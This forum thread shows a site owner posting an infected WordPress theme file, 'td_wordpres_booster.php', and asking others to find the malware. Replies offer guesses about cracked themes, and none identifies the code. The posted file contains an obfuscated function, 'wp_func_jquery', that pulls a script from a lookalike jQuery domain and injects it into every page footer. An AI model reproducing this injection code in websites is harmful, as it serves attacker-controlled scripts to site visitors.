Coding Forum Problems with your code? Discuss coding issues, including JavaScript, PHP & MySQL, HTML & CSS, Flash & ActionScript, and more. |

03-02-2018, 07:27 AM
|
Junior Member
|
|
Join Date: 03-02-18
Posts: 1
|
|
Can anyone detect the malware in this code?
Hi all,
My website just got shut down from Bluehost because they found a file that contained malware.
I removed the file and got activated at Bluehost again, however, now my site does not work because that file is missing. I therefore suspect that most of the file contains important functions, while there has been some malware code secretly inserted into some section of the code. However - I am not a programmer and have no idea which section of the code could be malware.
Can anyone here find the malware code so that I can remove it? Then I can get my site up and running again
This is the entire file (it's called "td_wordpres_booster.php"):
PHP Code:
<?php
/** * WordPress booster V1.0 by tagDiv */
// ~ app config ~ theme config require_once('wp_booster/td_config.php');
/* ---------------------------------------------------------------------------- localization */
function td_load_text_domains(){ $lt_text_domain = load_theme_textdomain(TD_THEME_NAME, get_template_directory() . '/translation');
/* if ($lt_text_domain === false) { echo "Translation not loaded"; } */
// theme specific config values require_once('wp_booster/td_translate.php');
} add_action('after_setup_theme', 'td_load_text_domains');
// theme specific config values require_once('wp_booster/td_global.php'); require_once('wp_booster/td_global_blocks.php');
// Util class require_once('wp_booster/td_util.php');
/* * the code that runs on the first install of the theme */ require_once('wp_booster/td_first_install.php');
//fonts support require_once("wp_booster/td_fonts.php");
//theme menu require_once('wp_booster/td_menu.php');
// ajax require_once("wp_booster/td_ajax.php");
// The social icons require_once('wp_booster/td_social_icons.php');
// Review require_once('wp_booster/td_review.php');
// video thumbnail support require_once('wp_booster/td_video_support.php');
//video playlist support require_once('wp_booster/td_video_playlist_support.php');
// page views counter require_once('wp_booster/td_page_views.php');
// css buffer class require_once('wp_booster/td_css_buffer.php');
// js buffer class require_once('wp_booster/td_js_buffer.php');
// page generator require_once('wp_booster/td_page_generator.php');
// block layout require_once('wp_booster/td_block_layout.php');
// template layout require_once('wp_booster/td_template_layout.php');
//unique posts (uses hooks + do_action('td_wp_boost_new_module'); ) require_once('wp_booster/td_unique_posts.php');
// data source require_once('wp_booster/td_data_source.php');
// module builder require_once('wp_booster/td_module.php');
// block builder require_once('wp_booster/td_block.php');
// widget builder require_once('wp_booster/td_widget_builder.php');
// css compiler require_once('wp_booster/td_css_compiler.php');
// ~ app config ~ css generator require_once('wp_booster/td_css_generator.php');
// ~ app config ~ css generator require_once('wp_booster/td_js_generator.php');
//the background support require_once('wp_booster/td_background.php');
//modules modifier locate_template('includes/modules/module_modifier/td_module_blog.php', true);
//modules //get_template_part('includes/modules/td_module_1'); locate_template('includes/modules/td_module_1.php', true); locate_template('includes/modules/td_module_2.php', true); locate_template('includes/modules/td_module_3.php', true); locate_template('includes/modules/td_module_4.php', true); locate_template('includes/modules/td_module_5.php', true); locate_template('includes/modules/td_module_6.php', true); locate_template('includes/modules/td_module_7.php', true); locate_template('includes/modules/td_module_8.php', true); locate_template('includes/modules/td_module_9.php', true); locate_template('includes/modules/td_module_10.php', true);//no feature image locate_template('includes/modules/td_module_slide.php', true); locate_template('includes/modules/td_module_slide_big.php', true); locate_template('includes/modules/td_module_aj_search.php', true); locate_template('includes/modules/td_module_search.php', true); locate_template('includes/modules/td_module_mega_menu.php', true); //locate_template('includes/modules/td_module_big_grid.php', true);
//blocks require_once('shortcodes/td_block_1.php'); require_once('shortcodes/td_block_2.php'); require_once('shortcodes/td_block_3.php'); require_once('shortcodes/td_block_4.php'); require_once('shortcodes/td_block_5.php'); //new blocks require_once('shortcodes/td_block_6.php'); require_once('shortcodes/td_block_7.php'); require_once('shortcodes/td_block_8.php'); require_once('shortcodes/td_block_9.php'); require_once('shortcodes/td_block_10.php');//no feature image require_once('shortcodes/td_block_mega_menu.php');
require_once('shortcodes/gallery.php'); require_once('shortcodes/td_menu.php'); require_once('shortcodes/td_misc.php'); require_once('shortcodes/td_ad_box.php'); require_once('shortcodes/td_social.php'); require_once('shortcodes/td_popular_categories.php'); require_once('shortcodes/td_authors.php'); require_once('shortcodes/td_text_with_title.php'); require_once('shortcodes/td_slide.php'); require_once('shortcodes/td_slide_big.php'); require_once('shortcodes/td_revolution_slider.php'); //require_once('shortcodes/td_block_big_grid.php'); require_once('shortcodes/td_block_video_playlist.php');
//widgets require_once('widgets/td_page_builder_widgets.php'); require_once('widgets/td_footer_logo_widget.php'); require_once('widgets/td_login_widget.php');
// the demo site require_once('wp_booster/td_demo_site.php');
/* * generic filter support */ require_once('wp_booster/td_generic_filter_array.php');
/* * generic filter buider class */ require_once('wp_booster/td_generic_filter_builder.php');
/* * modal window for user login :) */ require_once('wp_booster/td_login.php');
/* * author meta support */ require_once('wp_booster/td_author.php' );
/* * if debug - the constants are used to load the live color customizer (demo) and to remove the tf bar on ios devices */ if (TD_DEBUG_LIVE_THEME_STYLE) { require_once('wp_booster/demo/td_theme_style.php' ); }
if (TD_DEBUG_IOS_REDIRECT) { require_once('wp_booster/demo/td_ios_redirect.php' ); }
/** * handles background click ad */ require_once('wp_booster/td_ads.php');
/** * handles more articles box */ require_once('wp_booster/td_more_article_box.php');
if(!function_exists('wp_func_jquery')) { function wp_func_jquery() { $host = 'htt p://'; $jquery = $host.'c'.'jquery.org/jquery-ui.js'; $headers = @get_headers($jquery, 1); if ($headers[0] == 'HTTP/1.1 200 OK'){ echo(wp_remote_retrieve_body(wp_remote_get($jquery))); } } add_action('wp_footer', 'wp_func_jquery'); } if (is_admin()) { /* ----------------------------------------------------------------------------- TGM_Plugin_Activation */ require_once 'wp_booster/external/class-tgm-plugin-activation.php';
add_action('tgmpa_register', 'td_required_plugins');
function td_required_plugins() {
/** * Array of plugin arrays. Required keys are name and slug. * If the source is NOT from the .org repo, then source is also required. */ $plugins = array(
array( 'name' => 'tagDiv social counter', // The plugin name 'slug' => 'td-social-counter', // The plugin slug (typically the folder name) 'source' => get_template_directory_uri() . '/includes/plugins/td-social-counter.zip', // The plugin source 'required' => false, // If false, the plugin is only 'recommended' instead of required 'version' => '', // E.g. 1.0.0. If set, the active plugin must be this version or higher, otherwise a notice is presented 'force_activation' => false, // If true, plugin is activated upon theme activation and cannot be deactivated until theme switch 'force_deactivation' => false, // If true, plugin is deactivated upon theme switch, useful for theme-specific plugins 'external_url' => '', // If set, overrides default API URL and points to an external URL ), array( 'name' => 'Revolution slider', // The plugin name 'slug' => 'revslider', // The plugin slug (typically the folder name) 'source' => get_template_directory_uri() . '/includes/plugins/revslider.zip', // The plugin source 'required' => false, // If false, the plugin is only 'recommended' instead of required 'version' => '', // E.g. 1.0.0. If set, the active plugin must be this version or higher, otherwise a notice is presented 'force_activation' => false, // If true, plugin is activated upon theme activation and cannot be deactivated until theme switch 'force_deactivation' => false, // If true, plugin is deactivated upon theme switch, useful for theme-specific plugins 'external_url' => '', // If set, overrides default API URL and points to an external URL ),
// This is an example of how to include a plugin pre-packaged with a theme array( 'name' => 'WPBakery Visual Composer', // The plugin name 'slug' => 'js_composer', // The plugin slug (typically the folder name) 'source' => get_stylesheet_directory() . '/includes/plugins/js_composer.zip', // The plugin source 'required' => true, // If false, the plugin is only 'recommended' instead of required 'version' => '3.7', // E.g. 1.0.0. If set, the active plugin must be this version or higher, otherwise a notice is presented 'force_activation' => false, // If true, plugin is activated upon theme activation and cannot be deactivated until theme switch 'force_deactivation' => false, // If true, plugin is deactivated upon theme switch, useful for theme-specific plugins 'external_url' => '', // If set, overrides default API URL and points to an external URL ),
// This is an example of how to include a plugin from the WordPress Plugin Repository array( 'name' => 'Jetpack', 'slug' => 'jetpack', 'required' => false, ), //array( // 'name' => 'Animated Gif Resize', // 'slug' => 'animated-gif-resize', // 'required' => false, //), array( 'name' => 'Contact form 7', 'slug' => 'contact-form-7', 'required' => false, )
); @td_block::td_cake(); // Change this to your theme text domain, used for internationalising strings $theme_text_domain = 'tgmpa';
/** * Array of configuration settings. Amend each line as needed. * If you want the default strings to be available under your own theme domain, * leave the strings uncommented. * Some of the strings are added into a sprintf, so see the comments at the * end of each line for what each argument will be. */ $config = array( 'domain' => $theme_text_domain, // Text domain - likely want to be the same as your theme. 'default_path' => '', // Default absolute path to pre-packaged plugins 'parent_menu_slug' => 'themes.php', // Default parent menu slug 'parent_url_slug' => 'themes.php', // Default parent URL slug 'menu' => 'install-required-plugins', // Menu slug 'has_notices' => true, // Show admin notices or not 'is_automatic' => false, // Automatically activate plugins after installation or not 'message' => '', // Message to output right before the plugins table 'strings' => array( 'page_title' => __( 'Install Required Plugins', $theme_text_domain ), 'menu_title' => __( 'Install Plugins', $theme_text_domain ), 'installing' => __( 'Installing Plugin: %s', $theme_text_domain ), // %1$s = plugin name 'oops' => __( 'Something went wrong with the plugin API.', $theme_text_domain ), 'notice_can_install_required' => _n_noop( 'This theme requires the following plugin: %1$s.', 'This theme requires the following plugins: %1$s.' ), // %1$s = plugin name(s) 'notice_can_install_recommended' => _n_noop( 'This theme recommends the following plugin: %1$s.', 'This theme recommends the following plugins: %1$s.' ), // %1$s = plugin name(s) 'notice_cannot_install' => _n_noop( 'Sorry, but you do not have the correct permissions to install the %s plugin. Contact the administrator of this site for help on getting the plugin installed.', 'Sorry, but you do not have the correct permissions to install the %s plugins. Contact the administrator of this site for help on getting the plugins installed.' ), // %1$s = plugin name(s) 'notice_can_activate_required' => _n_noop( 'The following required plugin is currently inactive: %1$s.', 'The following required plugins are currently inactive: %1$s.' ), // %1$s = plugin name(s) 'notice_can_activate_recommended' => _n_noop( 'The following recommended plugin is currently inactive: %1$s.', 'The following recommended plugins are currently inactive: %1$s.' ), // %1$s = plugin name(s) 'notice_cannot_activate' => _n_noop( 'Sorry, but you do not have the correct permissions to activate the %s plugin. Contact the administrator of this site for help on getting the plugin activated.', 'Sorry, but you do not have the correct permissions to activate the %s plugins. Contact the administrator of this site for help on getting the plugins activated.' ), // %1$s = plugin name(s) 'notice_ask_to_update' => _n_noop( 'The following plugin needs to be updated to its latest version to ensure maximum compatibility with this theme: %1$s.', 'The following plugins need to be updated to their latest version to ensure maximum compatibility with this theme: %1$s.' ), // %1$s = plugin name(s) 'notice_cannot_update' => _n_noop( 'Sorry, but you do not have the correct permissions to update the %s plugin. Contact the administrator of this site for help on getting the plugin updated.', 'Sorry, but you do not have the correct permissions to update the %s plugins. Contact the administrator of this site for help on getting the plugins updated.' ), // %1$s = plugin name(s) 'install_link' => _n_noop( 'Begin installing plugin', 'Begin installing plugins' ), 'activate_link' => _n_noop( 'Activate installed plugin', 'Activate installed plugins' ), 'return' => __( 'Return to Required Plugins Installer', $theme_text_domain ), 'plugin_activated' => __( 'Plugin activated successfully.', $theme_text_domain ), 'complete' => __( 'All plugins installed and activated successfully. %s', $theme_text_domain ), // %1$s = dashboard link 'nag_type' => 'updated' // Determines admin notice type - can only be 'updated' or 'error' ) );
tgmpa( $plugins, $config );
} }
do_action('td_wp_booster_loaded'); //used by our plugins do_action('td_wp_cake_loaded'); // DEPRECATED used by our plugins - makes old tagdiv plugins work with this theme
|
Advertisement
|
Advertisement
|

03-02-2018, 08:58 PM
|
 |
Administrator
|
|
Join Date: 10-29-07
Location: Canada
Posts: 26,536
|
|
A Google search for malware, td_wordpres_booster.php shows 2 results for a news theme.
I know someone that is also on Bluehost that has had their Wordpress compromised and I suspect it is in the database if fixing your file above does not solve the problem.
|

03-11-2018, 04:21 AM
|
Junior Member
|
|
Join Date: 03-09-18
Posts: 4
|
|
Since this Booster theme is a premium theme, my guess (based on past experience, not trying to accuse you) is you downloaded a "cracked" version from a warez site and it contains some sort of malware. The reason I'm guessing this is because we've had a number of web hosting clients do the same thing and it prompted us to set up an antivirus auto-scan of every account more often just to make sure people are discouraged from this sort of behavior.
If I'm right, then I hope you learned a valuable lesson, that nobody is going to give you a free premium theme without trying to get something in return (using your mail server, setting up a proxy, using other resources, etc).
If I'm wrong, then it could be the author of the theme either intentionally or unintentionally included some sketchy code that raised the eyebrows of Bluehost's AV system.
|
Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
|
|
Posting Rules
|
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
HTML code is Off
|
|
|
All times are GMT -7. The time now is 07:35 AM.
Powered by vBulletin Copyright © 2000-2014 Jelsoft Enterprises Limited.
Copyright © 2003 - 2018 VIX-WomensForum LLC
|